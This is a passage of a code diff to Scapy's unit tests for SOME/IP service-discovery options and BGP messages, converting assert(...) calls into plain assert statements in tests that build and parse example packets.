SDOPTION_IP4_MCAST_LEN) -assert(opt.type == SDOPTION_IP4_MCAST_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.addr == "0.0.0.0") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x11) -assert(opt.port == 0x0) +assert opt.len == SDOPTION_IP4_MCAST_LEN +assert opt.type == SDOPTION_IP4_MCAST_TYPE +assert opt.res_hdr == 0x0 +assert opt.addr == "0.0.0.0" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x11 +assert opt.port == 0x0 = SDOption_IP4_Multicast: Build and dissect example opt = SDOption_IP4_Multicast(addr = "192.168.123.45", l4_proto = "TCP", port = 0x1234) optraw = opt.build() -assert(optraw == b"\x00\x09\x14\x00\xc0\xa8\x7b\x2d\x00\x06\x12\x34") +assert optraw == b"\x00\x09\x14\x00\xc0\xa8\x7b\x2d\x00\x06\x12\x34" opt = SDOption_IP4_Multicast(optraw) -assert(opt.len == SDOPTION_IP4_MCAST_LEN) -assert(opt.type == SDOPTION_IP4_MCAST_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.addr == "192.168.123.45") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x06) -assert(opt.port == 0x1234) +assert opt.len == SDOPTION_IP4_MCAST_LEN +assert opt.type == SDOPTION_IP4_MCAST_TYPE +assert opt.res_hdr == 0x00 +assert opt.addr == "192.168.123.45" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x06 +assert opt.port == 0x1234 = SDOption_IP4_Multicast: Build and dissect fully populated opt = SDOption_IP4_Multicast(len=0x1234, type=0x56, res_hdr=0x78, addr = "11.22.33.44", res_tail = 0x9a, l4_proto = 0xbc, port = 0xdef0) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78\x0b\x16\x21\x2c\x9a\xbc\xde\xf0") +assert optraw == b"\x12\x34\x56\x78\x0b\x16\x21\x2c\x9a\xbc\xde\xf0" opt = SDOption_IP4_Multicast(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.addr == "11.22.33.44") -assert(opt.res_tail == 0x9a) -assert(opt.l4_proto == 0xbc) -assert(opt.port == 0xdef0) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.addr == "11.22.33.44" +assert opt.res_tail == 0x9a +assert opt.l4_proto == 0xbc +assert opt.port == 0xdef0 ### SDOption_IP4_SD_EndPoint = SDOption_IP4_SD_EndPoint: Build and dissect empty opt = SDOption_IP4_SD_EndPoint() optraw = opt.build() -assert(optraw == b"\x00\x09\x24\x00\x00\x00\x00\x00\x00\x11\x00\x00") +assert optraw == b"\x00\x09\x24\x00\x00\x00\x00\x00\x00\x11\x00\x00" opt = SDOption_IP4_SD_EndPoint(optraw) -assert(opt.len == SDOPTION_IP4_SDENDPOINT_LEN) -assert(opt.type == SDOPTION_IP4_SDENDPOINT_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.addr == "0.0.0.0") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x11) -assert(opt.port == 0x0) +assert opt.len == SDOPTION_IP4_SDENDPOINT_LEN +assert opt.type == SDOPTION_IP4_SDENDPOINT_TYPE +assert opt.res_hdr == 0x0 +assert opt.addr == "0.0.0.0" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x11 +assert opt.port == 0x0 = SDOption_IP4_SD_EndPoint: Build and dissect example opt = SDOption_IP4_SD_EndPoint(addr = "192.168.123.45", l4_proto = "TCP", port = 0x1234) optraw = opt.build() -assert(optraw == b"\x00\x09\x24\x00\xc0\xa8\x7b\x2d\x00\x06\x12\x34") +assert optraw == b"\x00\x09\x24\x00\xc0\xa8\x7b\x2d\x00\x06\x12\x34" opt = SDOption_IP4_SD_EndPoint(optraw) -assert(opt.len == SDOPTION_IP4_SDENDPOINT_LEN) -assert(opt.type == SDOPTION_IP4_SDENDPOINT_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.addr == "192.168.123.45") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x06) -assert(opt.port == 0x1234) +assert opt.len == SDOPTION_IP4_SDENDPOINT_LEN +assert opt.type == SDOPTION_IP4_SDENDPOINT_TYPE +assert opt.res_hdr == 0x00 +assert opt.addr == "192.168.123.45" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x06 +assert opt.port == 0x1234 = SDOption_IP4_SD_EndPoint: Build and dissect fully populated opt = SDOption_IP4_SD_EndPoint(len=0x1234, type=0x56, res_hdr=0x78, addr = "11.22.33.44", res_tail = 0x9a, l4_proto = 0xbc, port = 0xdef0) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78\x0b\x16\x21\x2c\x9a\xbc\xde\xf0") +assert optraw == b"\x12\x34\x56\x78\x0b\x16\x21\x2c\x9a\xbc\xde\xf0" opt = SDOption_IP4_SD_EndPoint(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.addr == "11.22.33.44") -assert(opt.res_tail == 0x9a) -assert(opt.l4_proto == 0xbc) -assert(opt.port == 0xdef0) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.addr == "11.22.33.44" +assert opt.res_tail == 0x9a +assert opt.l4_proto == 0xbc +assert opt.port == 0xdef0 ### SDOption_IP6_EndPoint = SDOption_IP6_EndPoint: Build and dissect empty opt = SDOption_IP6_EndPoint() optraw = opt.build() -assert(optraw == b"\x00\x15\x06\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x11\x00\x00") +assert optraw == b"\x00\x15\x06\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x11\x00\x00" opt = SDOption_IP6_EndPoint(optraw) -assert(opt.len == SDOPTION_IP6_ENDPOINT_LEN) -assert(opt.type == SDOPTION_IP6_ENDPOINT_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.addr == "::") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x11) -assert(opt.port == 0x0) +assert opt.len == SDOPTION_IP6_ENDPOINT_LEN +assert opt.type == SDOPTION_IP6_ENDPOINT_TYPE +assert opt.res_hdr == 0x0 +assert opt.addr == "::" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x11 +assert opt.port == 0x0 = SDOption_IP6_EndPoint: Build and dissect example opt = SDOption_IP6_EndPoint(addr = "2001:cdba::3257:9652", l4_proto = "TCP", port = 0x1234) optraw = opt.build() -assert(optraw == b"\x00\x15\x06\x00" + b"\x20\x01\xcd\xba\x00\x00\x00\x00\x00\x00\x00\x00\x32\x57\x96\x52" + b"\x00\x06\x12\x34") +assert optraw == b"\x00\x15\x06\x00" + b"\x20\x01\xcd\xba\x00\x00\x00\x00\x00\x00\x00\x00\x32\x57\x96\x52" + b"\x00\x06\x12\x34" opt = SDOption_IP6_EndPoint(optraw) -assert(opt.len == SDOPTION_IP6_ENDPOINT_LEN) -assert(opt.type == SDOPTION_IP6_ENDPOINT_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.addr == "2001:cdba::3257:9652") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x06) -assert(opt.port == 0x1234) +assert opt.len == SDOPTION_IP6_ENDPOINT_LEN +assert opt.type == SDOPTION_IP6_ENDPOINT_TYPE +assert opt.res_hdr == 0x00 +assert opt.addr == "2001:cdba::3257:9652" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x06 +assert opt.port == 0x1234 = SDOption_IP6_EndPoint: Build and dissect fully populated opt = SDOption_IP6_EndPoint(len=0x1234, type=0x56, res_hdr=0x78, addr = "1234:5678:9abc:def0:0fed:cba9:8765:4321", res_tail = 0x9a, l4_proto = 0xbc, port = 0xdef0) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78" + b"\x12\x34\x56\x78\x9a\xbc\xde\xf0\x0f\xed\xcb\xa9\x87\x65\x43\x21" + b"\x9a\xbc\xde\xf0") +assert optraw == b"\x12\x34\x56\x78" + b"\x12\x34\x56\x78\x9a\xbc\xde\xf0\x0f\xed\xcb\xa9\x87\x65\x43\x21" + b"\x9a\xbc\xde\xf0" opt = SDOption_IP6_EndPoint(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.addr == "1234:5678:9abc:def0:fed:cba9:8765:4321") -assert(opt.res_tail == 0x9a) -assert(opt.l4_proto == 0xbc) -assert(opt.port == 0xdef0) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.addr == "1234:5678:9abc:def0:fed:cba9:8765:4321" +assert opt.res_tail == 0x9a +assert opt.l4_proto == 0xbc +assert opt.port == 0xdef0 ### SDOption_IP6_Multicast = SDOption_IP6_Multicast: Build and dissect empty opt = SDOption_IP6_Multicast() optraw = opt.build() -assert(optraw == b"\x00\x15\x16\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x11\x00\x00") +assert optraw == b"\x00\x15\x16\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x11\x00\x00" opt = SDOption_IP6_Multicast(optraw) -assert(opt.len == SDOPTION_IP6_MCAST_LEN) -assert(opt.type == SDOPTION_IP6_MCAST_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.addr == "::") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x11) -assert(opt.port == 0x0) +assert opt.len == SDOPTION_IP6_MCAST_LEN +assert opt.type == SDOPTION_IP6_MCAST_TYPE +assert opt.res_hdr == 0x0 +assert opt.addr == "::" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x11 +assert opt.port == 0x0 = SDOption_IP6_Multicast: Build and dissect example opt = SDOption_IP6_Multicast(addr = "2001:cdba::3257:9652", l4_proto = "TCP", port = 0x1234) optraw = opt.build() -assert(optraw == b"\x00\x15\x16\x00" + b"\x20\x01\xcd\xba\x00\x00\x00\x00\x00\x00\x00\x00\x32\x57\x96\x52" + b"\x00\x06\x12\x34") +assert optraw == b"\x00\x15\x16\x00" + b"\x20\x01\xcd\xba\x00\x00\x00\x00\x00\x00\x00\x00\x32\x57\x96\x52" + b"\x00\x06\x12\x34" opt = SDOption_IP6_Multicast(optraw) -assert(opt.len == SDOPTION_IP6_MCAST_LEN) -assert(opt.type == SDOPTION_IP6_MCAST_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.addr == "2001:cdba::3257:9652") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x06) -assert(opt.port == 0x1234) +assert opt.len == SDOPTION_IP6_MCAST_LEN +assert opt.type == SDOPTION_IP6_MCAST_TYPE +assert opt.res_hdr == 0x00 +assert opt.addr == "2001:cdba::3257:9652" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x06 +assert opt.port == 0x1234 = SDOption_IP6_Multicast: Build and dissect fully populated opt = SDOption_IP6_Multicast(len=0x1234, type=0x56, res_hdr=0x78, addr = "1234:5678:9abc:def0:0fed:cba9:8765:4321", res_tail = 0x9a, l4_proto = 0xbc, port = 0xdef0) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78" + b"\x12\x34\x56\x78\x9a\xbc\xde\xf0\x0f\xed\xcb\xa9\x87\x65\x43\x21" + b"\x9a\xbc\xde\xf0") +assert optraw == b"\x12\x34\x56\x78" + b"\x12\x34\x56\x78\x9a\xbc\xde\xf0\x0f\xed\xcb\xa9\x87\x65\x43\x21" + b"\x9a\xbc\xde\xf0" opt = SDOption_IP6_Multicast(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.addr == "1234:5678:9abc:def0:fed:cba9:8765:4321") -assert(opt.res_tail == 0x9a) -assert(opt.l4_proto == 0xbc) -assert(opt.port == 0xdef0) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.addr == "1234:5678:9abc:def0:fed:cba9:8765:4321" +assert opt.res_tail == 0x9a +assert opt.l4_proto == 0xbc +assert opt.port == 0xdef0 ### SDOption_IP6_SD_EndPoint = SDOption_IP6_SD_EndPoint: Build and dissect empty opt = SDOption_IP6_SD_EndPoint() optraw = opt.build() -assert(optraw == b"\x00\x15\x26\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x11\x00\x00") +assert optraw == b"\x00\x15\x26\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x11\x00\x00" opt = SDOption_IP6_SD_EndPoint(optraw) -assert(opt.len == SDOPTION_IP6_SDENDPOINT_LEN) -assert(opt.type == SDOPTION_IP6_SDENDPOINT_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.addr == "::") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x11) -assert(opt.port == 0x0) +assert opt.len == SDOPTION_IP6_SDENDPOINT_LEN +assert opt.type == SDOPTION_IP6_SDENDPOINT_TYPE +assert opt.res_hdr == 0x0 +assert opt.addr == "::" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x11 +assert opt.port == 0x0 = SDOption_IP6_SD_EndPoint: Build and dissect example opt = SDOption_IP6_SD_EndPoint(addr = "2001:cdba::3257:9652", l4_proto = "TCP", port = 0x1234) optraw = opt.build() -assert(optraw == b"\x00\x15\x26\x00" + b"\x20\x01\xcd\xba\x00\x00\x00\x00\x00\x00\x00\x00\x32\x57\x96\x52" + b"\x00\x06\x12\x34") +assert optraw == b"\x00\x15\x26\x00" + b"\x20\x01\xcd\xba\x00\x00\x00\x00\x00\x00\x00\x00\x32\x57\x96\x52" + b"\x00\x06\x12\x34" opt = SDOption_IP6_SD_EndPoint(optraw) -assert(opt.len == SDOPTION_IP6_SDENDPOINT_LEN) -assert(opt.type == SDOPTION_IP6_SDENDPOINT_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.addr == "2001:cdba::3257:9652") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x06) -assert(opt.port == 0x1234) +assert opt.len == SDOPTION_IP6_SDENDPOINT_LEN +assert opt.type == SDOPTION_IP6_SDENDPOINT_TYPE +assert opt.res_hdr == 0x00 +assert opt.addr == "2001:cdba::3257:9652" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x06 +assert opt.port == 0x1234 = SDOption_IP6_SD_EndPoint: Build and dissect fully populated opt = SDOption_IP6_SD_EndPoint(len=0x1234, type=0x56, res_hdr=0x78, addr = "1234:5678:9abc:def0:0fed:cba9:8765:4321", res_tail = 0x9a, l4_proto = 0xbc, port = 0xdef0) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78" + b"\x12\x34\x56\x78\x9a\xbc\xde\xf0\x0f\xed\xcb\xa9\x87\x65\x43\x21" + b"\x9a\xbc\xde\xf0") +assert optraw == b"\x12\x34\x56\x78" + b"\x12\x34\x56\x78\x9a\xbc\xde\xf0\x0f\xed\xcb\xa9\x87\x65\x43\x21" + b"\x9a\xbc\xde\xf0" opt = SDOption_IP6_SD_EndPoint(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.addr == "1234:5678:9abc:def0:fed:cba9:8765:4321") -assert(opt.res_tail == 0x9a) -assert(opt.l4_proto == 0xbc) -assert(opt.port == 0xdef0) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.addr == "1234:5678:9abc:def0:fed:cba9:8765:4321" +assert opt.res_tail == 0x9a +assert opt.l4_proto == 0xbc +assert opt.port == 0xdef0 = verify building and parsing of multiple SDOptions def _opts_check(opts): @@ -702,7 +702,7 @@ def _opts_check(opts): sd.len_option_array = optslen sd.show() SD(sd.build()).show() - assert(sd.show(dump=True) == SD(sd.build()).show(dump=True)) + assert sd.show(dump=True) == SD(sd.build()).show(dump=True) # options are built and reparsed, to make sure all is calculated opts = [ diff --git a/test/contrib/bgp.uts b/test/contrib/bgp.uts index 2e7720d1b18..d9e0c5992a9 100644 --- a/test/contrib/bgp.uts +++ b/test/contrib/bgp.uts @@ -56,8 +56,8 @@ nlri.prefix == '2001:db8::/32' = BGP - Instantiation (Should be a KEEPALIVE) m = BGP() -assert(raw(m) == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04') -assert(m.type == BGP.KEEPALIVE_TYPE) +assert raw(m) == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04' +assert m.type == BGP.KEEPALIVE_TYPE = BGP - Instantiation with specific values (1) raw(BGP(type = 0)) == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x00' @@ -79,13 +79,13 @@ raw(BGP(type = 5)) == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff = BGP - Basic dissection h = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04') -assert(h.type == BGP.KEEPALIVE_TYPE) -assert(h.len == 19) +assert h.type == BGP.KEEPALIVE_TYPE +assert h.len == 19 = BGP - Dissection with specific values h = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x01') -assert(h.type == BGP.OPEN_TYPE) -assert(h.len == 19) +assert h.type == BGP.OPEN_TYPE +assert h.len == 19 ############################### BGPKeepAlive ################################# + BGPKeepAlive class tests @@ -110,7 +110,7 @@ raw(BGPCapability()) == b'\x00\x00' = BGPCapability - Instantiation with specific values (1) c = BGPCapability(code = 70) -assert(raw(c) == b'F\x00') +assert raw(c) == b'F\x00' = BGPCapability - Check exception from scapy.contrib.bgp import _BGPInvalidDataException @@ -146,7 +146,7 @@ assert len(s) == 1 = BGPCapMultiprotocol - Inheritance c = BGPCapMultiprotocol() -assert(isinstance(c, BGPCapability)) +assert isinstance(c, BGPCapability) = BGPCapMultiprotocol - Instantiation raw(BGPCapMultiprotocol()) == b'\x01\x04\x00\x00\x00\x00' @@ -159,11 +159,11 @@ raw(BGPCapMultiprotocol(afi = 2, safi = 1)) == b'\x01\x04\x00\x02\x00\x01' = BGPCapMultiprotocol - Dissection with specific values c = BGPCapMultiprotocol(b'\x01\x04\x00\x02\x00\x01') -assert(c.code == 1) -assert(c.length == 4) -assert(c.afi == 2) -assert(c.reserved == 0) -assert(c.safi == 1) +assert c.code == 1 +assert c.length == 4 +assert c.afi == 2 +assert c.reserved == 0 +assert c.safi == 1 ############################### BGPCapORFBlock ############################### + BGPCapORFBlock class tests @@ -209,7 +209,7 @@ c.orf_type == 64 and c.send_receive == 3 = BGPCapORF - Inheritance c = BGPCapORF() -assert(isinstance(c, BGPCapability)) +assert isinstance(c, BGPCapability) = BGPCapORF - Instantiation raw(BGPCapORF()) == b'\x03\x00' @@ -230,7 +230,7 @@ c.code == 3 and c.orf[0].afi == 1 and c.orf[0].safi == 1 and c.orf[0].entries[0] = BGPCapORF - Dissection p = BGPCapORF(b'\x03\x07\x00\x01\x00\x01\x01@\x03') -assert(len(p.orf) == 1) +assert len(p.orf) == 1 ####################### BGPCapGracefulRestart.GRTuple ######################### @@ -256,7 +256,7 @@ c.afi == 1 and c.safi == 1 and c.flags == 128 = BGPCapGracefulRestart - Inheritance c = BGPCapGracefulRestart() -assert(isinstance(c, BGPCapGracefulRestart)) +assert isinstance(c, BGPCapGracefulRestart) = BGPCapGracefulRestart - Instantiation raw(BGPCapGracefulRestart()) == b'@\x02\x00\x00' @@ -287,7 +287,7 @@ c.code == 64 and c.restart_time == 120 and c.restart_flags == 0x8 and c.entries[ = BGPCapFourBytesASN - Inheritance c = BGPCapFourBytesASN() -assert(isinstance(c, BGPCapFourBytesASN)) +assert isinstance(c, BGPCapFourBytesASN) = BGPCapFourBytesASN - Instantiation raw(BGPCapFourBytesASN()) == b'A\x04\x00\x00\x00\x00' @@ -377,18 +377,18 @@ raw(BGPOpen(my_as = 64503, bgp_id = "192.168.100.3", hold_time = 30, opt_params = BGPOpen - Dissection with specific values (1) m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00?\x01\x04\xfb\xf7\x00\x1e\xc0\xa8d\x03"\x02\x06\x01\x04\x00\x01\x00\x01\x02\x02\x80\x00\x02\x02\x02\x00\x02\x08@\x06\x00x\x00\x01\x01\x80\x02\x06A\x04\x00\x00\xfb\xf7') -assert(BGPHeader in m and BGPOpen in m) -assert(m.len == 63) -assert(m.type == BGP.OPEN_TYPE) -assert(m.version == 4) -assert(m.my_as == 64503) -assert(m.hold_time == 30) -assert(m.bgp_id == "192.168.100.3") -assert(m.opt_param_len == 34) -assert(isinstance(m.opt_params[0].param_value, BGPCapMultiprotocol)) -assert(isinstance(m.opt_params[1].param_value, BGPCapability)) -assert(isinstance(m.opt_params[2].param_value, BGPCapability)) -assert(isinstance(m.opt_params[3].param_value, BGPCapGracefulRestart)) +assert BGPHeader in m and BGPOpen in m +assert m.len == 63 +assert m.type == BGP.OPEN_TYPE +assert m.version == 4 +assert m.my_as == 64503 +assert m.hold_time == 30 +assert m.bgp_id == "192.168.100.3" +assert m.opt_param_len == 34 +assert isinstance(m.opt_params[0].param_value, BGPCapMultiprotocol) +assert isinstance(m.opt_params[1].param_value, BGPCapability) +assert isinstance(m.opt_params[2].param_value, BGPCapability) +assert isinstance(m.opt_params[3].param_value, BGPCapGracefulRestart) = BGPOpen - Dissection with specific values (2) (followed by a KEEPALIVE) messages = b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00=\x01\x04\xfb\xf6\x00\xb4\xc0\xa8ze \x02\x06\x01\x04\x00\x01\x00\x01\x02\x06\x01\x04\x00\x02\x00\x01\x02\x02\x80\x00\x02\x02\x02\x00\x02\x06A\x04\x00\x00\xfb\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04' @@ -397,11 +397,11 @@ raw(m) == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00 = BGPOpen - Dissection with specific values (3) m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x8f\x01\x04\xfd\xe8\x00\xb4\n\xff\xff\x01r\x02\x06\x01\x04\x00\x01\x00\x84\x02\x06\x01\x04\x00\x19\x00A\x02\x06\x01\x04\x00\x02\x00\x02\x02\x06\x01\x04\x00\x01\x00\x02\x02\x06\x01\x04\x00\x02\x00\x80\x02\x06\x01\x04\x00\x01\x00\x80\x02\x06\x01\x04\x00\x01\x00B\x02\x06\x01\x04\x00\x02\x00\x01\x02\x06\x01\x04\x00\x02\x00\x04\x02\x06\x01\x04\x00\x01\x00\x01\x02\x06\x01\x04\x00\x01\x00\x04\x02\x02\x80\x00\x02\x02\x02\x00\x02\x04@\x02\x80x\x02\x02F\x00\x02\x06A\x04\x00\x00\xfd\xe8') -assert(BGPHeader in m and BGPOpen in m) +assert BGPHeader in m and BGPOpen in m = BGPOpen - Dissection with specific values (4) m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x8f\x01\x04\xfd\xe8\x00\xb4\n\xff\xff\x02r\x02\x06\x01\x04\x00\x01\x00\x84\x02\x06\x01\x04\x00\x19\x00A\x02\x06\x01\x04\x00\x02\x00\x02\x02\x06\x01\x04\x00\x01\x00\x02\x02\x06\x01\x04\x00\x02\x00\x80\x02\x06\x01\x04\x00\x01\x00\x80\x02\x06\x01\x04\x00\x01\x00B\x02\x06\x01\x04\x00\x02\x00\x01\x02\x06\x01\x04\x00\x02\x00\x04\x02\x06\x01\x04\x00\x01\x00\x01\x02\x06\x01\x04\x00\x01\x00\x04\x02\x02\x80\x00\x02\x02\x02\x00\x02\x04@\x02\x00x\x02\x02F\x00\x02\x06A\x04\x00\x00\xfd\xe8') -assert(BGPHeader in m and BGPOpen in m) +assert BGPHeader in m and BGPOpen in m ################################# BGPPAOrigin ################################# @@ -642,40 +642,40 @@ raw(BGPUpdate()) == b'\x00\x00\x00\x00' = BGPUpdate - Dissection (1) bgp_module_conf.use_2_bytes_asn = True m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x000\x02\x00\x19\x18\xc0\xa8\x96\x18\x07\x07\x07\x18\xc63d\x18\xc0\xa8\x01\x19\x06\x06\x06\x00\x18\xc0\xa8\x1a\x00\x00') -assert(BGPHeader in m and BGPUpdate in m) -assert(m.withdrawn_routes_len == 25) -assert(m.withdrawn_routes[0].prefix == "192.168.150.0/24") -assert(m.withdrawn_routes[5].prefix == "192.168.26.0/24") -assert(m.path_attr_len == 0) +assert BGPHeader in m and BGPUpdate in m +assert m.withdrawn_routes_len == 25 +assert m.withdrawn_routes[0].prefix == "192.168.150.0/24" +assert m.withdrawn_routes[5].prefix == "192.168.26.0/24" +assert m.path_attr_len == 0 = BGPUpdate - Behave like a NEW speaker (RFC 6793) - Dissection (2) bgp_module_conf.use_2_bytes_asn = False m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00=\x02\x00\x00\x00"@\x01\x01\x00@\x02\x06\x02\x01\x00\x00\xfb\xfa@\x03\x04\xc0\xa8\x10\x06\x80\x04\x04\x00\x00\x00\x00\xc0\x08\x04\xff\xff\xff\x01\x18\xc0\xa8\x01') -assert(BGPHeader in m and BGPUpdate in m) -assert(m.path_attr[1].attribute.segments[0].segment_value == [64506]) -assert(m.path_attr[4].attribute.community == 0xFFFFFF01) -assert(m.nlri[0].prefix == "192.168.1.0/24") +assert BGPHeader in m and BGPUpdate in m +assert m.path_attr[1].attribute.segments[0].segment_value == [64506] +assert m.path_attr[4].attribute.community == 0xFFFFFF01 +assert m.nlri[0].prefix == "192.168.1.0/24" = BGPUpdate - Dissection (MP_REACH_NLRI) m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\xd8\x02\x00\x00\x00\xc1@\x01\x01\x00@\x02\x06\x02\x01\x00\x00\xfb\xf6\x90\x0e\x00\xb0\x00\x02\x01 \xfe\x80\x00\x00\x00\x00\x00\x00\xfa\xc0\x01\x00\x15\xde\x15\x81\xfe\x80\x00\x00\x00\x00\x00\x00\xfa\xc0\x01\x00\x15\xde\x15\x81\x00\x06\x04\x05\x08\x04\x10\x03`\x03\x80\x03\xa0\x03\xc0\x04\xe0\x05\xf0\x06\xf8\t\xfe\x00\x16 \x01<\x08-\x07.\x040\x10?\xfe\x10 \x02\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff@\x01\x00\x00\x00\x00\x00\x00\x00\x17 \x01\x00 \x01\x00\x000 \x01\x00\x02\x00\x00 \x01\r\xb8\x1c \x01\x00\x10\x07\xfc\n\xfe\x80\x08\xff\n\xfe\xc0\x03 \x03@\x08_`\x00d\xff\x9b\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x01\x07\x02') -assert(BGPHeader in m and BGPUpdate in m) -assert(m.path_attr[2].attribute.afi == 2) -assert(m.path_attr[2].attribute.safi == 1) -assert(m.path_attr[2].attribute.nh_addr_len == 32) -assert(m.path_attr[2].attribute.nh_v6_global == "fe80::fac0:100:15de:1581") -assert(m.path_attr[2].attribute.nh_v6_link_local == "fe80::fac0:100:15de:1581") -assert(m.path_attr[2].attribute.nlri[0].prefix == "400::/6") -assert(m.nlri == []) +assert BGPHeader in m and BGPUpdate in m +assert m.path_attr[2].attribute.afi == 2 +assert m.path_attr[2].attribute.safi == 1 +assert m.path_attr[2].attribute.nh_addr_len == 32 +assert m.path_attr[2].attribute.nh_v6_global == "fe80::fac0:100:15de:1581" +assert m.path_attr[2].attribute.nh_v6_link_local == "fe80::fac0:100:15de:1581" +assert m.path_attr[2].attribute.nlri[0].prefix == "400::/6" +assert m.nlri == [] = BGPUpdate - Dissection (MP_UNREACH_NLRI) m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00s\x02\x00\x00\x00\\\x90\x0f\x00X\x00\x02\x01\x03`\x03\x80\x03\xa0\x03\xc0\x04\xe0\x05\xf0\x06\xf8\x10 \x02`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff@\x01\x00\x00\x00\x00\x00\x00\x00\x17 \x01\x00 \x01\x00\x000 \x01\x00\x02\x00\x00 \x01\r\xb8\n\xfe\xc0\x07\xfc\n\xfe\x80\x1c \x01\x00\x10\x03 \x06\x04\x03@\x08_\x05\x08\x04\x10') -assert(BGPHeader in m and BGPUpdate in m) -assert(m.path_attr[0].attribute.afi == 2) -assert(m.path_attr[0].attribute.safi == 1) -assert(m.path_attr[0].attribute.afi_safi_specific.withdrawn_routes[0].prefix == "6000::/3") -assert(m.nlri == []) +assert BGPHeader in m and BGPUpdate in m +assert m.path_attr[0].attribute.afi == 2 +assert m.path_attr[0].attribute.safi == 1 +assert 